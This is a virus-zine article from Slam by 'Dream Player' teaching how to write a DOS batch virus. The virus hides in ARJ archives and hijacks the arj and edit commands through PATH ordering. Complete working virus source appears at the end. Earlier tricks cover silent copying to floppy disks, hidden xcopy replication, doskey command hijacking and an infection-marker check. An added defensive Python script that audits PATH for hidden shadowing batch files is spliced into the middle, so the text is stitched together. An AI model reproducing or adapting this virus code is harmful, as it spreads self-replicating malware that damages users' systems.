
SLAM3.005: ARJ - Batch file infector by Dream Player

Published in Slam · 2 years ago

SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM 
| |
S Dream Player's S
L L
A ARJ - Batch file infector A
M M
| |
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM


Hi guys!

Do you want to have some (quiet) new infection methods?
Here is one.

You know arj?
Did you know that it extracts hidden files?
Did you know that it is easy to get the search paths of DOS?

Look at this line:

for %%a in (%path%) do %0 %%a      (very important part)


Type "set" at the prompt and you will see the entries of %path%, like this:

C:\WINDOWS;C:\DOS;C:\A86


Because of the ';'s the for-command gives you each entry separately:

%0(command)  C:\WINDOWS 
%0 C:\DOS
%0 C:\A86


%0 stands for edit

(Arj will extract the hidden file edit.bat. If the user types edit, he starts the virus.)

Because the file run by "do %0 %%a" has the extension "bat", control passes to that batch file and never comes back to the for-command, so edit is called only one time (with the first search path as parameter).

So.. Why do we need the first path??

Look:
If you install arj you have to add a new entry to your search path,
like this (in Autoexec.bat):

path %path%;C:\ARj


or

path C:\WINDOWS;C:\DOS;C:\ARJ


So you can put an arj.bat into C:\WINDOWS (e.g.) and it will be run instead of arj.exe in C:\ARJ, because DOS searches the first path first, then the second and so on..

Ok.
The user types "arj a game *.exe" and what will happen?

The virus calls arj.exe to do the compressing and then infects the archive by adding an edit.bat with the attribute 'hidden'.

Now, if you extract the files of 'game.arj', arj extracts the hidden edit.bat, too. If the user types edit, the virus (edit.bat) will install itself in the first search path.

Ok. So far.
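As an added illustration from the defender's side (this is not code from the article), here is a small Python audit that models the DOS lookup order described above and flags exactly this situation: a batch file, possibly hidden, sitting earlier in %PATH% than the program of the same name. The PATH string and directory listings are constructed sample data, and the current-directory lookup that DOS does before %PATH% is left out.

```python
import os
from typing import Dict, List, Set, Tuple

EXT_ORDER = (".COM", ".EXE", ".BAT")   # DOS tries these per directory, in this order
FS = Dict[str, Dict[str, Set[str]]]    # directory -> {filename: attribute letters, e.g. {"H"}}

def split_path(path: str) -> List[str]:
    """Split a DOS %PATH% on ';', dropping empty entries; DOS names are case-insensitive."""
    return [p.strip().upper() for p in path.split(";") if p.strip()]

def _listing(fs: FS, directory: str) -> Dict[str, Set[str]]:
    """Case-insensitive view of one directory's files (empty if the directory is unknown)."""
    for d, files in fs.items():
        if d.upper() == directory:
            return {n.upper(): a for n, a in files.items()}
    return {}

def resolve(path: str, fs: FS, cmd: str) -> List[Tuple[str, str]]:
    """Every file DOS could run for `cmd`, in lookup order; element 0 is what actually runs."""
    hits = []
    for d in split_path(path):
        files = _listing(fs, d)
        for ext in EXT_ORDER:
            if cmd.upper() + ext in files:
                hits.append((d, cmd.upper() + ext))
    return hits

def audit(path: str, fs: FS) -> List[dict]:
    """Flag hidden .BAT files on the PATH and .BAT files that shadow a later .COM/.EXE."""
    findings, stems = [], set()
    for d in split_path(path):
        for name, attrs in _listing(fs, d).items():
            stem, ext = os.path.splitext(name)
            stems.add(stem)
            if ext == ".BAT" and "H" in attrs:   # the dropper uses 'attrib +h'
                findings.append({"cmd": stem, "issue": "hidden batch file on PATH", "file": d + "\\" + name})
    for cmd in sorted(stems):
        hits = resolve(path, fs, cmd)
        shadowed = [d + "\\" + n for d, n in hits[1:] if not n.endswith(".BAT")]
        if hits and hits[0][1].endswith(".BAT") and shadowed:
            findings.append({"cmd": cmd, "issue": "batch file shadows program",
                             "file": hits[0][0] + "\\" + hits[0][1], "shadows": shadowed})
    return findings

# Constructed sample: the machine state the article describes after an infection
SAMPLE_PATH = "C:\\WINDOWS;C:\\DOS;C:\\ARJ"
SAMPLE_FS = {
    "C:\\WINDOWS": {"ARJ.BAT": {"H"}, "EDIT.BAT": {"H"}, "WIN.COM": set()},
    "C:\\DOS": {"EDIT.COM": set(), "XCOPY.EXE": set()},
    "C:\\ARJ": {"ARJ.EXE": set()},
}

if __name__ == "__main__":
    for finding in audit(SAMPLE_PATH, SAMPLE_FS):
        print(finding)
```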

(This is harmless!, the idea is not that new, and now that everyone speaks of macro viruses, I think it's time to say this, too.)

Did you know this?

command /f /c copy test.txt a:\


will try to copy test.txt onto a:. But if a: is write-protected, DOS won't ask you whether to go on.
In combination with 'ctty nul' you can make a batch file that tries to copy itself onto a disk, and no error will be shown.
So you can make a batch virus that copies itself into the first path (for..) and tries to infect a disk on every edit command.

Win95 is very helpful:
there you don't need

command /f


try this (it's really funny):

(you should name it edit.bat)

@%0.com %1 
@xcopy %0.* %windir%/h>nul
@xcopy %windir%\%0.*/h>nul


Or doskey! (Win95: new option /echo:off|on)

Type:

doskey /e:off dir=virus


DOS won't execute the dir command; it will call virus and you won't see it.

You want to know if a batch file is already infected by a batch virus?

find "xxmyvirusxx" test.bat>nul 
if errorlevel 1 then goto infect....


Ok, I never had to give a batch file to another person, and on the internet you can't find many batch files, but using DOS commands makes it very easy to write a virus.

Try to understand this arj virus and have fun! (and some new ideas)

(You can also use rar or other packers; even if they don't hide the files, who cares?)

bye bye


Here it is:

@echo off 
if (%washere%)==(1) goto next
set washere=1
set params=%1 %2 %3 %4 %5 %6 %7 %8 %9
for %%a in (%path%) do %0 %%a
:next
set firstpath=%1
if %0==arj goto arj
%0.com %params%
if exist %firstpath%\arj.bat goto end
type edit.bat>%firstpath%\arj.bat
attrib +h %firstpath%\arj.bat
type edit.bat>%firstpath%\edit.bat
attrib +h %firstpath%\edit.bat
goto end
:arj
%0.exe %params%
for %%a in (*.arj) do %0.exe a %%a %firstpath%\edit.bat -a -e>nul
:end
echo.
set washere=
set params=
set firstpath=


- Dream Player -
